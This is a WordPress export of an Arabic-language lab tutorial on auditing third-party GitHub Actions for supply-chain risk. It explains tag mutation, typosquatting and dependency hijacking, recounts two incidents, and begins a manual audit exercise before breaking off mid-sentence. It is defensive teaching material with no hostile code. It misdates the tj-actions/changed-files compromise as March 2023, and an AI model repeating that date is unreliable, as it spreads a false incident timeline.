{"id":828,"date":"2026-03-25T10:02:25","date_gmt":"2026-03-25T09:02:25","guid":{"rendered":"https:\/\/secure-pipelines.com\/uncategorized\/lab-detecting-malicious-github-actions-static-analysis\/"},"modified":"2026-03-25T10:02:25","modified_gmt":"2026-03-25T09:02:25","slug":"lab-detecting-malicious-github-actions-static-analysis","status":"publish","type":"post","link":"https:\/\/secure-pipelines.com\/ar\/ci-cd-security\/lab-detecting-malicious-github-actions-static-analysis\/","title":{"rendered":"\u0645\u062e\u062a\u0628\u0631: \u0627\u0643\u062a\u0634\u0627\u0641 GitHub Actions \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u062b\u0627\u0628\u062a"},"content":{"rendered":"<h2>\u0646\u0638\u0631\u0629 \u0639\u0627\u0645\u0629<\/h2>\n<p>\u062a\u064f\u0639\u062f GitHub Actions \u0645\u0646 \u0627\u0644\u0623\u0637\u0631\u0627\u0641 \u0627\u0644\u062b\u0627\u0644\u062b\u0629 \u0648\u0627\u062d\u062f\u0629 \u0645\u0646 \u0623\u0643\u062b\u0631 \u0627\u0644\u0645\u064a\u0632\u0627\u062a \u0645\u0644\u0627\u0621\u0645\u0629 \u0641\u064a \u0646\u0638\u0627\u0645 GitHub. \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u062a\u0648\u062c\u064a\u0647 <code>uses:<\/code> \u0648\u0627\u062d\u062f\u060c \u064a\u0645\u0643\u0646\u0643 \u0627\u0633\u062a\u064a\u0631\u0627\u062f \u0645\u0646\u0637\u0642 \u0628\u0646\u0627\u0621 \u0645\u0639\u0642\u062f\u060c \u0623\u0648 \u0627\u0644\u0646\u0634\u0631 \u0639\u0644\u0649 \u0645\u0632\u0648\u062f\u064a \u0627\u0644\u062e\u062f\u0645\u0627\u062a \u0627\u0644\u0633\u062d\u0627\u0628\u064a\u0629\u060c \u0623\u0648 \u062a\u0634\u063a\u064a\u0644 \u0623\u062f\u0648\u0627\u062a \u0627\u0644\u0641\u062d\u0635 \u0627\u0644\u0623\u0645\u0646\u064a. \u0644\u0643\u0646 \u0647\u0630\u0647 \u0627\u0644\u0631\u0627\u062d\u0629 \u062a\u0623\u062a\u064a \u0645\u0639 \u0645\u0642\u0627\u064a\u0636\u0629 \u062d\u0631\u062c\u0629: \u0643\u0644 action \u0645\u0646 \u0637\u0631\u0641 \u062b\u0627\u0644\u062b \u062a\u0646\u0641\u0630 \u0634\u064a\u0641\u0631\u0629 \u0628\u0631\u0645\u062c\u064a\u0629 \u0641\u064a \u0628\u064a\u0626\u0629 CI \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0643 \u0645\u0639 \u0625\u0645\u0643\u0627\u0646\u064a\u0629 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0623\u0633\u0631\u0627\u0631\u0643 \u0648\u0631\u0645\u0648\u0632\u0643 \u0627\u0644\u0645\u0645\u064a\u0632\u0629 \u0648\u0634\u064a\u0641\u0631\u062a\u0643 \u0627\u0644\u0645\u0635\u062f\u0631\u064a\u0629.<\/p>\n<p>\u064a\u0645\u0643\u0646 \u0644\u0640 action \u0645\u062e\u062a\u0631\u0642\u0629 \u0623\u0648 \u062e\u0628\u064a\u062b\u0629 \u0623\u0646 \u062a\u0633\u0631\u0651\u0628 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f\u060c \u0623\u0648 \u062a\u062d\u0642\u0646 \u0634\u064a\u0641\u0631\u0629 \u0641\u064a \u0645\u062e\u0631\u062c\u0627\u062a \u0627\u0644\u0628\u0646\u0627\u0621\u060c \u0623\u0648 \u062a\u0639\u062f\u0651\u0644 \u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629 \u0644\u062a\u063a\u064a\u064a\u0631 \u0627\u0644\u062e\u0637\u0648\u0627\u062a \u0627\u0644\u0644\u0627\u062d\u0642\u0629\u060c \u0623\u0648 \u062a\u0636\u0639 \u0628\u0627\u0628\u064b\u0627 \u062e\u0644\u0641\u064a\u064b\u0627 \u0641\u064a \u0625\u0635\u062f\u0627\u0631\u0627\u062a\u0643. \u0639\u0644\u0649 \u0639\u0643\u0633 \u0627\u0644\u062a\u0628\u0639\u064a\u0627\u062a \u0627\u0644\u0645\u064f\u062f\u0627\u0631\u0629 \u0628\u0648\u0627\u0633\u0637\u0629 \u0645\u062f\u064a\u0631\u064a \u0627\u0644\u062d\u0632\u0645\u060c \u062a\u0641\u062a\u0642\u0631 GitHub Actions \u0625\u0644\u0649 \u0646\u0638\u0627\u0645 \u062a\u062d\u0642\u0642 \u0642\u0648\u064a\u060c \u0645\u0645\u0627 \u064a\u062c\u0639\u0644\u0647\u0627 \u0647\u062f\u0641\u064b\u0627 \u0631\u0626\u064a\u0633\u064a\u064b\u0627 \u0644\u0647\u062c\u0645\u0627\u062a \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f.<\/p>\n<p>\u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062e\u062a\u0628\u0631 \u0627\u0644\u0639\u0645\u0644\u064a\u060c \u0633\u062a\u062a\u0639\u0644\u0645:<\/p>\n<ul>\n<li>\u062a\u062f\u0642\u064a\u0642 actions \u0627\u0644\u0623\u0637\u0631\u0627\u0641 \u0627\u0644\u062b\u0627\u0644\u062b\u0629 \u064a\u062f\u0648\u064a\u064b\u0627 \u0628\u062d\u062b\u064b\u0627 \u0639\u0646 \u0633\u0644\u0648\u0643 \u0645\u0634\u0628\u0648\u0647<\/li>\n<li>\u0627\u0633\u062a\u062e\u062f\u0627\u0645 <strong>actionlint<\/strong> \u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0623\u062e\u0637\u0627\u0621 \u0627\u0644\u062a\u0643\u0648\u064a\u0646 \u0648\u062b\u063a\u0631\u0627\u062a \u062d\u0642\u0646 \u0627\u0644\u062a\u0639\u0628\u064a\u0631\u0627\u062a<\/li>\n<li>\u0627\u0633\u062a\u062e\u062f\u0627\u0645 <strong>zizmor<\/strong> \u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u0623\u0646\u0645\u0627\u0637 \u0627\u0644\u0645\u0636\u0627\u062f\u0629 \u0644\u0644\u0623\u0645\u0627\u0646 \u0641\u064a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644<\/li>\n<li>\u062a\u062b\u0628\u064a\u062a actions \u0628\u0645\u0631\u0627\u062c\u0639 SHA \u063a\u064a\u0631 \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631 \u0648\u0623\u062a\u0645\u062a\u0629 \u0627\u0644\u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 Dependabot<\/li>\n<li>\u0641\u0631\u0636 \u0642\u0627\u0626\u0645\u0629 \u0628\u064a\u0636\u0627\u0621 \u0644\u0644\u0640 actions \u0644\u0645\u0646\u0639 \u0627\u0644\u0640 actions \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u0631\u062d \u0628\u0647\u0627 \u0645\u0646 \u0627\u0644\u062f\u062e\u0648\u0644 \u0625\u0644\u0649 \u062e\u0637\u0648\u0637 \u0627\u0644\u0623\u0646\u0627\u0628\u064a\u0628 \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0643<\/li>\n<li>\u0645\u0631\u0627\u0642\u0628\u0629 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0645\u0646 \u062e\u0644\u0627\u0644 CODEOWNERS \u0648\u0641\u062d\u0648\u0635\u0627\u062a PR \u0627\u0644\u0622\u0644\u064a\u0629<\/li>\n<\/ul>\n<p>\u0628\u0646\u0647\u0627\u064a\u0629 \u0647\u0630\u0627 \u0627\u0644\u0645\u062e\u062a\u0628\u0631\u060c \u0633\u064a\u0643\u0648\u0646 \u0644\u062f\u064a\u0643 \u0627\u0633\u062a\u0631\u0627\u062a\u064a\u062c\u064a\u0629 \u062f\u0641\u0627\u0639 \u0645\u062a\u0639\u062f\u062f\u0629 \u0627\u0644\u0637\u0628\u0642\u0627\u062a \u062a\u0642\u0644\u0644 \u0645\u0646 \u0645\u062e\u0627\u0637\u0631 \u0627\u062e\u062a\u0631\u0627\u0642 \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f \u0645\u0646 \u062e\u0644\u0627\u0644 GitHub Actions.<\/p>\n<h2>\u0627\u0644\u0645\u062a\u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0623\u0633\u0627\u0633\u064a\u0629<\/h2>\n<p>\u0642\u0628\u0644 \u0628\u062f\u0621 \u0647\u0630\u0627 \u0627\u0644\u0645\u062e\u062a\u0628\u0631\u060c \u062a\u0623\u0643\u062f \u0645\u0646 \u062a\u0648\u0641\u0631:<\/p>\n<ul>\n<li><strong>\u062d\u0633\u0627\u0628 GitHub<\/strong> \u0645\u0639 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0625\u0646\u0634\u0627\u0621 \u0627\u0644\u0645\u0633\u062a\u0648\u062f\u0639\u0627\u062a \u0648\u062a\u0643\u0648\u064a\u0646 Actions<\/li>\n<li><strong>\u0645\u0633\u062a\u0648\u062f\u0639 \u0627\u062e\u062a\u0628\u0627\u0631<\/strong> \u2014 \u0623\u0646\u0634\u0626 \u0645\u0633\u062a\u0648\u062f\u0639\u064b\u0627 \u062c\u062f\u064a\u062f\u064b\u0627 \u0623\u0648 \u0627\u0633\u062a\u062e\u062f\u0645 \u0645\u0633\u062a\u0648\u062f\u0639\u064b\u0627 \u0645\u0648\u062c\u0648\u062f\u064b\u0627 \u063a\u064a\u0631 \u0625\u0646\u062a\u0627\u062c\u064a \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 GitHub Actions \u0648\u0627\u062d\u062f \u0639\u0644\u0649 \u0627\u0644\u0623\u0642\u0644<\/li>\n<li><strong>Git CLI<\/strong> \u0645\u062b\u0628\u062a \u0648\u0645\u0635\u0627\u062f\u0642 \u0645\u0639 GitHub<\/li>\n<li><strong>Node.js 18+<\/strong> (\u0645\u0637\u0644\u0648\u0628 \u0644\u0628\u0639\u0636 \u0627\u0644\u0623\u062f\u0648\u0627\u062a)<\/li>\n<li><strong>Python 3.9+<\/strong> (\u0644\u062a\u062b\u0628\u064a\u062a zizmor)<\/li>\n<li><strong>GitHub CLI (<code>gh<\/code>)<\/strong> \u2014 \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0645\u0646 <a href=\"https:\/\/cli.github.com\/\" target=\"_blank\" rel=\"noopener\">cli.github.com<\/a><\/li>\n<li><strong>\u0645\u0639\u0631\u0641\u0629 \u0623\u0633\u0627\u0633\u064a\u0629 \u0628\u0640 GitHub Actions<\/strong> \u2014 \u064a\u062c\u0628 \u0623\u0646 \u062a\u0641\u0647\u0645 \u0635\u064a\u0627\u063a\u0629 YAML \u0644\u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644\u060c \u0648\u0627\u0644\u0648\u0638\u0627\u0626\u0641\u060c \u0648\u0627\u0644\u062e\u0637\u0648\u0627\u062a\u060c \u0648\u0627\u0644\u0643\u0644\u0645\u0629 \u0627\u0644\u0645\u0641\u062a\u0627\u062d\u064a\u0629 <code>uses:<\/code><\/li>\n<\/ul>\n<p>\u0623\u0646\u0634\u0626 \u0645\u0633\u062a\u0648\u062f\u0639 \u0627\u062e\u062a\u0628\u0627\u0631 \u0625\u0630\u0627 \u0644\u0645 \u064a\u0643\u0646 \u0644\u062f\u064a\u0643 \u0648\u0627\u062d\u062f:<\/p>\n<pre><code>gh repo create actions-security-lab --public --clone\ncd actions-security-lab\nmkdir -p .github\/workflows<\/code><\/pre>\n<p>\u0623\u0646\u0634\u0626 \u0645\u0644\u0641 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 \u0646\u0645\u0648\u0630\u062c\u064a \u0641\u064a <code>.github\/workflows\/ci.yml<\/code> \u0633\u0646\u0633\u062a\u062e\u062f\u0645\u0647 \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062e\u062a\u0628\u0631:<\/p>\n<pre><code>name: CI Pipeline\non:\n  push:\n    branches: [main]\n  pull_request:\n    branches: [main]\n\npermissions:\n  contents: read\n\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions\/checkout@v4\n      - uses: actions\/setup-node@v4\n        with:\n          node-version: '20'\n      - uses: actions\/cache@v4\n        with:\n          path: ~\/.npm\n          key: ${{ runner.os }}-npm-${{ hashFiles('**\/package-lock.json') }}\n      - run: npm ci\n      - run: npm test<\/code><\/pre>\n<h2>\u0641\u0647\u0645 \u0627\u0644\u062a\u0647\u062f\u064a\u062f<\/h2>\n<p>\u0642\u0628\u0644 \u0623\u0646 \u0646\u0628\u062f\u0623 \u0628\u0627\u0644\u0641\u062d\u0635 \u0648\u0627\u0644\u062a\u062f\u0642\u064a\u0642\u060c \u0645\u0646 \u0627\u0644\u0645\u0647\u0645 \u0641\u0647\u0645 \u0643\u064a\u0641 \u062a\u0635\u0628\u062d GitHub Actions \u0646\u0648\u0627\u0642\u0644 \u0647\u062c\u0648\u0645. \u0647\u0646\u0627\u0643 \u0639\u062f\u0629 \u0637\u0631\u0642 \u0627\u062e\u062a\u0631\u0627\u0642 \u0645\u0648\u062b\u0642\u0629 \u062c\u064a\u062f\u064b\u0627:<\/p>\n<h3>\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u062d\u0633\u0627\u0628 \u0627\u0644\u0645\u0634\u0631\u0641<\/h3>\n<p>\u064a\u062d\u0635\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0639\u0644\u0649 \u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u062d\u0633\u0627\u0628 GitHub \u0644\u0645\u0634\u0631\u0641 \u0627\u0644\u0640 action \u2014 \u0645\u0646 \u062e\u0644\u0627\u0644 \u062d\u0634\u0648 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f\u060c \u0623\u0648 \u0627\u0644\u062a\u0635\u064a\u062f \u0627\u0644\u0627\u062d\u062a\u064a\u0627\u0644\u064a\u060c \u0623\u0648 \u0627\u062e\u062a\u0637\u0627\u0641 \u0627\u0644\u062c\u0644\u0633\u0629. \u0628\u0645\u062c\u0631\u062f \u0633\u064a\u0637\u0631\u062a\u0647 \u0639\u0644\u0649 \u0627\u0644\u062d\u0633\u0627\u0628\u060c \u064a\u062f\u0641\u0639 \u0634\u064a\u0641\u0631\u0629 \u062e\u0628\u064a\u062b\u0629 \u0625\u0644\u0649 \u0645\u0633\u062a\u0648\u062f\u0639 \u0627\u0644\u0640 action \u0648\u064a\u062d\u062f\u0651\u062b \u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a \u0627\u0644\u0645\u0648\u062c\u0648\u062f\u0629 \u0644\u0644\u0625\u0634\u0627\u0631\u0629 \u0625\u0644\u0649 \u0627\u0644\u0627\u0644\u062a\u0632\u0627\u0645 \u0627\u0644\u0645\u062e\u062a\u0631\u0642. \u0643\u0644 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 \u064a\u0634\u064a\u0631 \u0625\u0644\u0649 \u062a\u0644\u0643 \u0627\u0644\u0639\u0644\u0627\u0645\u0629 \u064a\u0633\u062d\u0628 \u0627\u0644\u0646\u0633\u062e\u0629 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0641\u0648\u0631\u064b\u0627 \u0641\u064a \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u062a\u0627\u0644\u064a.<\/p>\n<h3>\u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a \u0627\u0644\u062e\u0628\u064a\u062b\u0629<\/h3>\n<p>\u0639\u0644\u0627\u0645\u0627\u062a Git \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631. \u064a\u0645\u0643\u0646 \u0644\u0645\u0634\u0631\u0641 \u0627\u0644\u0640 action (\u0623\u0648 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0644\u0630\u064a \u0644\u062f\u064a\u0647 \u0635\u0644\u0627\u062d\u064a\u0629 \u0627\u0644\u062f\u0641\u0639) \u062d\u0630\u0641 \u0639\u0644\u0627\u0645\u0629 \u0645\u062b\u0644 <code>v1<\/code> \u0648\u0625\u0639\u0627\u062f\u0629 \u0625\u0646\u0634\u0627\u0626\u0647\u0627 \u0645\u0634\u064a\u0631\u0629 \u0625\u0644\u0649 \u0627\u0644\u062a\u0632\u0627\u0645 \u0645\u062e\u062a\u0644\u0641. \u0625\u0630\u0627 \u0643\u0627\u0646 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644\u0643 \u064a\u0633\u062a\u062e\u062f\u0645 <code>uses: some-action\/tool@v1<\/code>\u060c \u0641\u0623\u0646\u062a \u062a\u062b\u0642 \u0628\u0623\u0646 \u0627\u0644\u0639\u0644\u0627\u0645\u0629 \u062a\u0634\u064a\u0631 \u062f\u0627\u0626\u0645\u064b\u0627 \u0625\u0644\u0649 \u0634\u064a\u0641\u0631\u0629 \u0622\u0645\u0646\u0629. \u0647\u0630\u0647 \u0627\u0644\u062b\u0642\u0629 \u064a\u0645\u0643\u0646 \u0627\u0646\u062a\u0647\u0627\u0643\u0647\u0627 \u0628\u0633\u0647\u0648\u0644\u0629.<\/p>\n<h3>\u0627\u0646\u062a\u062d\u0627\u0644 \u0627\u0644\u0623\u0633\u0645\u0627\u0621 \u0627\u0644\u0645\u062a\u0634\u0627\u0628\u0647\u0629<\/h3>\n<p>\u064a\u0646\u0634\u0626 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u0648\u0646 actions \u0628\u0623\u0633\u0645\u0627\u0621 \u0645\u0634\u0627\u0628\u0647\u0629 \u0628\u0634\u0643\u0644 \u0645\u0631\u0628\u0643 \u0644\u0644\u0640 actions \u0627\u0644\u0634\u0627\u0626\u0639\u0629. \u0639\u0644\u0649 \u0633\u0628\u064a\u0644 \u0627\u0644\u0645\u062b\u0627\u0644:<\/p>\n<ul>\n<li><code>actions\/checkout<\/code> (\u0634\u0631\u0639\u064a) \u0645\u0642\u0627\u0628\u0644 <code>action\/checkout<\/code> (\u0627\u0646\u062a\u062d\u0627\u0644)<\/li>\n<li><code>actions\/setup-node<\/code> \u0645\u0642\u0627\u0628\u0644 <code>actions\/setup-nodejs<\/code><\/li>\n<li><code>docker\/build-push-action<\/code> \u0645\u0642\u0627\u0628\u0644 <code>docker\/build-and-push-action<\/code><\/li>\n<\/ul>\n<p>\u062e\u0637\u0623 \u0625\u0645\u0644\u0627\u0626\u064a \u0648\u0627\u062d\u062f \u0641\u064a \u0645\u0644\u0641 YAML \u0644\u0645\u0633\u0627\u0631 \u0639\u0645\u0644\u0643 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u062d\u0628 action \u0645\u062e\u062a\u0644\u0641\u0629 \u062a\u0645\u0627\u0645\u064b\u0627 \u0648\u062e\u0628\u064a\u062b\u0629.<\/p>\n<h3>\u0627\u062e\u062a\u0637\u0627\u0641 \u0627\u0644\u062a\u0628\u0639\u064a\u0627\u062a<\/h3>\n<p>\u0627\u0644\u0639\u062f\u064a\u062f \u0645\u0646 GitHub Actions \u0645\u0628\u0646\u064a\u0629 \u0639\u0644\u0649 JavaScript \u0648\u0644\u062f\u064a\u0647\u0627 \u062a\u0628\u0639\u064a\u0627\u062a <code>node_modules<\/code> \u062e\u0627\u0635\u0629 \u0628\u0647\u0627. \u0625\u0630\u0627 \u062a\u0645 \u0627\u062e\u062a\u0631\u0627\u0642 \u0625\u062d\u062f\u0649 \u062a\u0628\u0639\u064a\u0627\u062a \u0627\u0644\u0640 action (\u0639\u0628\u0631 \u0647\u062c\u0648\u0645 \u0633\u0644\u0633\u0644\u0629 \u062a\u0648\u0631\u064a\u062f npm)\u060c \u062a\u0635\u0628\u062d \u0627\u0644\u0640 action \u0646\u0641\u0633\u0647\u0627 \u0646\u0627\u0642\u0644 \u0647\u062c\u0648\u0645 \u2014 \u062d\u062a\u0649 \u0644\u0648 \u0643\u0627\u0646\u062a \u0634\u064a\u0641\u0631\u0629 \u0627\u0644\u0640 action \u0646\u0641\u0633\u0647\u0627 \u0646\u0638\u064a\u0641\u0629.<\/p>\n<h3>\u062d\u0648\u0627\u062f\u062b \u0648\u0627\u0642\u0639\u064a\u0629<\/h3>\n<p><strong>tj-actions\/changed-files (\u0645\u0627\u0631\u0633 2023):<\/strong> \u0627\u062e\u062a\u0631\u0642 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u0648\u0646 \u0627\u0644\u0640 action \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u0629 \u0639\u0644\u0649 \u0646\u0637\u0627\u0642 \u0648\u0627\u0633\u0639 <code>tj-actions\/changed-files<\/code> \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u062d\u0633\u0627\u0628 \u0627\u0644\u0645\u0634\u0631\u0641. \u0639\u062f\u0651\u0644\u0648\u0627 \u0627\u0644\u0640 action \u0644\u062a\u0633\u0631\u064a\u0628 \u0623\u0633\u0631\u0627\u0631 CI\/CD \u0639\u0646 \u0637\u0631\u064a\u0642 \u062a\u0641\u0631\u064a\u063a \u0630\u0627\u0643\u0631\u0629 \u0627\u0644\u0645\u064f\u0634\u063a\u0651\u0644 \u0648\u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629 \u0641\u064a \u0633\u062c\u0644\u0627\u062a \u0645\u0633\u0627\u0631 \u0627\u0644\u0639\u0645\u0644. \u062a\u0623\u062b\u0631\u062a \u0622\u0644\u0627\u0641 \u0627\u0644\u0645\u0633\u062a\u0648\u062f\u0639\u0627\u062a \u0644\u0623\u0646\u0647\u0627 \u0623\u0634\u0627\u0631\u062a \u0625\u0644\u0649 \u0639\u0644\u0627\u0645\u0627\u062a \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631 \u0628\u062f\u0644\u0627\u064b \u0645\u0646 SHA \u0645\u062b\u0628\u062a\u0629.<\/p>\n<p><strong>codecov\/codecov-action (2021):<\/strong> \u062a\u0645 \u062a\u0639\u062f\u064a\u0644 Codecov Bash Uploader \u0628\u0648\u0627\u0633\u0637\u0629 \u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u062d\u0635\u0644\u0648\u0627 \u0639\u0644\u0649 \u0627\u0644\u0648\u0635\u0648\u0644 \u0645\u0646 \u062e\u0644\u0627\u0644 \u0635\u0648\u0631\u0629 Docker \u0645\u062e\u062a\u0631\u0642\u0629 \u0645\u0633\u062a\u062e\u062f\u0645\u0629 \u0641\u064a \u0639\u0645\u0644\u064a\u0629 CI \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0640 Codecov. \u0642\u0627\u0645 \u0627\u0644\u0633\u0643\u0631\u064a\u0628\u062a \u0627\u0644\u0645\u0639\u062f\u0651\u0644 \u0628\u062a\u0633\u0631\u064a\u0628 \u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629 \u2014 \u0628\u0645\u0627 \u0641\u064a \u0630\u0644\u0643 \u0631\u0645\u0648\u0632 CI \u0648\u0645\u0641\u0627\u062a\u064a\u062d API \u0648\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f \u2014 \u0645\u0646 \u0628\u064a\u0626\u0627\u062a CI \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0627\u0644\u0639\u0645\u0644\u0627\u0621. \u0623\u062b\u0631 \u0647\u0630\u0627 \u0639\u0644\u0649 \u0639\u062f\u062f \u0643\u0628\u064a\u0631 \u0645\u0646 \u0627\u0644\u0645\u0646\u0638\u0645\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0634\u063a\u0644 action \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0640 Codecov \u0641\u064a \u062e\u0637\u0648\u0637 \u0623\u0646\u0627\u0628\u064a\u0628\u0647\u0627.<\/p>\n<p>\u062a\u0634\u062a\u0631\u0643 \u0647\u0630\u0647 \u0627\u0644\u062d\u0648\u0627\u062f\u062b \u0641\u064a \u0646\u0645\u0637 \u0645\u0634\u062a\u0631\u0643: <strong>\u0627\u0644\u062b\u0642\u0629 \u0641\u064a \u0627\u0644\u0645\u0631\u0627\u062c\u0639 \u0627\u0644\u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631<\/strong>. \u0643\u0627\u0646 \u064a\u0645\u0643\u0646 \u062a\u062e\u0641\u064a\u0641 \u0643\u0644\u062a\u0627 \u0627\u0644\u062d\u0627\u062f\u062b\u062a\u064a\u0646 \u0639\u0646 \u0637\u0631\u064a\u0642 \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0628\u0640 SHA \u063a\u064a\u0631 \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631 \u0648\u062a\u062f\u0642\u064a\u0642 \u0633\u0644\u0648\u0643 \u0627\u0644\u0640 action \u0642\u0628\u0644 \u0627\u0639\u062a\u0645\u0627\u062f\u0647\u0627.<\/p>\n<h2>\u0627\u0644\u062a\u0645\u0631\u064a\u0646 1: \u0627\u0644\u062a\u062f\u0642\u064a\u0642 \u0627\u0644\u064a\u062f\u0648\u064a \u0644\u0644\u0640 Actions<\/h2>\n<p>\u0627\u0644\u0623\u062f\u0648\u0627\u062a \u0627\u0644\u0622\u0644\u064a\u0629 \u0636\u0631\u0648\u0631\u064a\u0629\u060c \u0644\u0643\u0646 \u0644\u0627 \u0628\u062f\u064a\u0644 \u0639\u0646 \u0641\u0647\u0645 \u0645\u0627 \u062a\u0641\u0639\u0644\u0647 \u0627\u0644\u0640 action \u0641\u0639\u0644\u0627\u064b. \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u062a\u0645\u0631\u064a\u0646\u060c \u0633\u062a\u0642\u0648\u0645 \u0628\u062a\u062f\u0642\u064a\u0642 \u062b\u0644\u0627\u062b actions \u0634\u0627\u0626\u0639\u0629 \u0627\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u064a\u062f\u0648\u064a\u064b\u0627 \u0644\u0628\u0646\u0627\u0621 \u062d\u062f\u0633\u0643 \u0641\u064a \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u0623\u0646\u0645\u0627\u0637 \u0627\u0644\u0645\u0634\u0628\u0648\u0647\u0629.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 1: \u0627\u062e\u062a\u064a\u0627\u0631 \u0627\u0644\u0640 Actions \u0644\u0644\u062a\u062f\u0642\u064a\u0642<\/h3>\n<p>\u0645\u0646 \u0645\u0633\u0627\u0631 \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u0646\u0645\u0648\u0630\u062c\u064a \u0623\u0639\u0644\u0627\u0647\u060c \u0633\u0646\u0642\u0648\u0645 \u0628\u062a\u062f\u0642\u064a\u0642:<\/p>\n<ol>\n<li><code>actions\/checkout@v4<\/code><\/li>\n<li><code>actions\/setup-node@v4<\/code><\/li>\n<li><code>actions\/cache@v4<\/code><\/li>\n<\/ol>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 2: \u0645\u0631\u0627\u062c\u0639\u0629 <code>action.yml<\/code><\/h3>\n<p>\u0644\u0643\u0644 action\u060c \u0627\u0628\u062f\u0623 \u0628\u0641\u062d\u0635 \u0645\u0644\u0641 <code>action.yml<\/code> \u0641\u064a \u0645\u0633\u062a\u0648\u062f\u0639 \u0627\u0644\u0640 action. \u064a\u062d\u062f\u062f \u0647\u0630\u0627 \u0627\u0644\u0645\u0644\u0641 \u0627\u0644\u0645\u062f\u062e\u0644\u0627\u062a \u0648\u0627\u0644\u0645\u062e\u0631\u062c\u0627\u062a \u0648\u0646\u0642\u0637\u0629 \u0627\u0644\u062f\u062e\u0648\u0644 \u0644\u0644\u0640 action.<\/p>\n<pre><code># \u0627\u0633\u062a\u0646\u0633\u0627\u062e \u0627\u0644\u0640 action \u0644\u0644\u0641\u062d\u0635 \u0645\u062d\u0644\u064a\u064b\u0627\ngit clone --depth 1 https:\/\/github.com\/actions\/checkout.git \/tmp\/audit-checkout\ncat \/tmp\/audit-checkout\/action.yml<\/code><\/pre>\n<p>\u0627\u0644\u0623\u0634\u064a\u0627\u0621 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629 \u0627\u0644\u062a\u064a \u064a\u062c\u0628 \u0627\u0644\u0628\u062d\u062b \u0639\u0646\u0647\u0627 \u0641\u064a <code>action.yml<\/code>:<\/p>\n<ul>\n<li><strong>\u0646\u0642\u0637\u0629 \u0627\u0644\u062f\u062e\u0648\u0644:<\/strong> \u0647\u0644 \u0647\u064a action \u0645\u0646 \u0646\u0648\u0639 <code>node<\/code> (\u062a\u0634\u063a\u0644 JavaScript)\u060c \u0623\u0648 <code>composite<\/code> (\u062a\u0634\u063a\u0644 \u062e\u0637\u0648\u0627\u062a)\u060c \u0623\u0648 